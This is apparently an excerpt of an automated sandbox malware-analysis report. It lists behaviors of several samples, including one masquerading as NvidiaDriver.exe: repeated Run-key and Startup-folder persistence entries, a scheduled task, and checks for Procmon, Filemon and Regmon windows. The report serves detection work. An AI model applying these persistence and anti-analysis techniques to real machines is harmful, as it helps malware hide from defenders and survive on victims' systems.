                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_ba7abb8ebaa34d3ead4ea9700ae33943Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_857dfbcf71e84a5ba3b172f733901942Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_400319cbe8234e299c9163230ec2deeaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_1c99dc55ccc049b597d24c458c370a37Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_9e33ce0e554b44ea9bcca3bea135d0c9Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_33472d2aae864347a0bf15e0fc5876a3Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_af5be24324564f8598b7623cec319969Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_a55229b8a2774bf08fa8699a442ee253Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_d98eb4fbef8244ecb9602668b4296585Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_6c8e335835fe406d94395125cb905191Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_030623400dd34e5c8d138cfa53278235Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_bec0a0ec3f194774a3f57ddb54802f67Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_aeaa297d9f6e41859577216271c48f3dJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_62877d2b645b4648b854ced2335150cbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_db0ad8af55074ec6a35fe3c2f19759beJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_48773bbf9bc44914991bdff0f06d6074Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_64f63a88bdff4eefb01bb065932cd846Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_8b829bb3d45a4aab8b3ed7f3d49c5fb9Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_c85face801814dfcbf9f40ddf33828eaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_087ea3eefa284f9190e36501b7153e61Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_199e6de3cc44472a85f055bce5f42086Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_7d53de950f514e7fb1dc1bf9aa9d9a23Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_ca448a9bcb184f7387acce04e7da97c2Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_dcc27a0fe2814cfdb3b842eaa11bb6b9Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_cef09dcf6b774f79a4710801a7f389d4.lnkJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_cef09dcf6b774f79a4710801a7f389d4.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_5076c9e3d6c54857a127aabaa9953371.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_2b2dd6f89d0648b49b19fb6d0049ab97.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_9c42162aa6064cf496382fa5fa9e7a59.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_40a333e62b3245feb9875db00366e537.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_318d6c1d27b14600820d5c1954e1143f.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_0337b408af9a4e6b835026f5a14df7c8.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_3e2c4608ee2c413ab2c52f7c591fe146.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_0a509360e9e545b68da05213f779415b.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_c7fb3b173d3247c7ad4c060c7997efda.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_5d5114f2b78945199c3be89ad614c09d.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_4472c0c28e264555be93599bae62b8a6.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_e4d4afef04e44d44933a3a176b275626.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_47f9cda654d3460a8bdfb32342b71236.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_ac3b4eb0820a4042991d922e6cef16b2.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_e6036c26af1d43118879e0a8a36cf924.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_f7e0cbcf85e84f73b37791fc6a985ab9.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_eb561c1a12034c2eb4d4d4327700c0ed.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_782e4936eddf44dd94468e70166fe8b4.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_3c7b8f1e8ee94038b44eaf24fa1b18f7.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_e2d3d741884b43529853ff8c87ed5336.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_fc0a8a6f5b474d09838b74de29eeb11f.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_de66a07cc206428089333ea38f399555.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_9a81a00d066d4bfa82dcac5a08bde51a.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_6719133747fd44faaab1433219bf7dc9.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_35c5431ed5714ae89884a986955f0da4.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_18ffc5a1725442b398f31d86a5253020.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_67e78d46677546c8a89b0be1cc1a70da.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_dd570d0f421f4e5797a46bcd9f0fa633.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_29431715c0454c79b9fd4c99c9087c86.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_cad9115b911f4737b404433fa80c2364.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_e7801b58c00345e5af02a481fc6970b6.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_461994a0584e408eb3dcf4bd676ca6d8.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_3d05c516b5834b8dabc47ef19f64e664.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_d0714fc59c6f40cb8ea795c5e1717a6b.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_ac4144b37c7a4eae9106eb435fb53e9d.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_cdaecd11468d45dea4c17641898fa3be.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_2e4768b1e3b147a5bd970a59e886abc7.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_db0ad8af55074ec6a35fe3c2f19759beJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_db0ad8af55074ec6a35fe3c2f19759beJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_400319cbe8234e299c9163230ec2deeaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_400319cbe8234e299c9163230ec2deeaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_62877d2b645b4648b854ced2335150cbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_62877d2b645b4648b854ced2335150cbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_64f63a88bdff4eefb01bb065932cd846Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_64f63a88bdff4eefb01bb065932cd846Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_468ca0ebc2464ad1addaa7c10eb3dff6Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_468ca0ebc2464ad1addaa7c10eb3dff6Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_b7f403d427dd4c4797c6de880996ae9eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_b7f403d427dd4c4797c6de880996ae9eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_030623400dd34e5c8d138cfa53278235Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_030623400dd34e5c8d138cfa53278235Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_1c99dc55ccc049b597d24c458c370a37Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_1c99dc55ccc049b597d24c458c370a37Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_65e75b2ecd364929acc31930f272d177Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_65e75b2ecd364929acc31930f272d177Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_8b829bb3d45a4aab8b3ed7f3d49c5fb9Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_8b829bb3d45a4aab8b3ed7f3d49c5fb9Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_f1f5be2991ff4378aa04280f68f2731dJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_f1f5be2991ff4378aa04280f68f2731dJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_ba7abb8ebaa34d3ead4ea9700ae33943Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_ba7abb8ebaa34d3ead4ea9700ae33943Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_33472d2aae864347a0bf15e0fc5876a3Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_33472d2aae864347a0bf15e0fc5876a3Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_6c8e335835fe406d94395125cb905191Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_6c8e335835fe406d94395125cb905191Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_28ad21eac4844c0f9fd2a61c5bb412c1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_28ad21eac4844c0f9fd2a61c5bb412c1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_9e33ce0e554b44ea9bcca3bea135d0c9Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_9e33ce0e554b44ea9bcca3bea135d0c9Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_199e6de3cc44472a85f055bce5f42086Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_199e6de3cc44472a85f055bce5f42086Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_98c017189ac44e4caa3f411a0cc7df75Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_98c017189ac44e4caa3f411a0cc7df75Jump to behavior
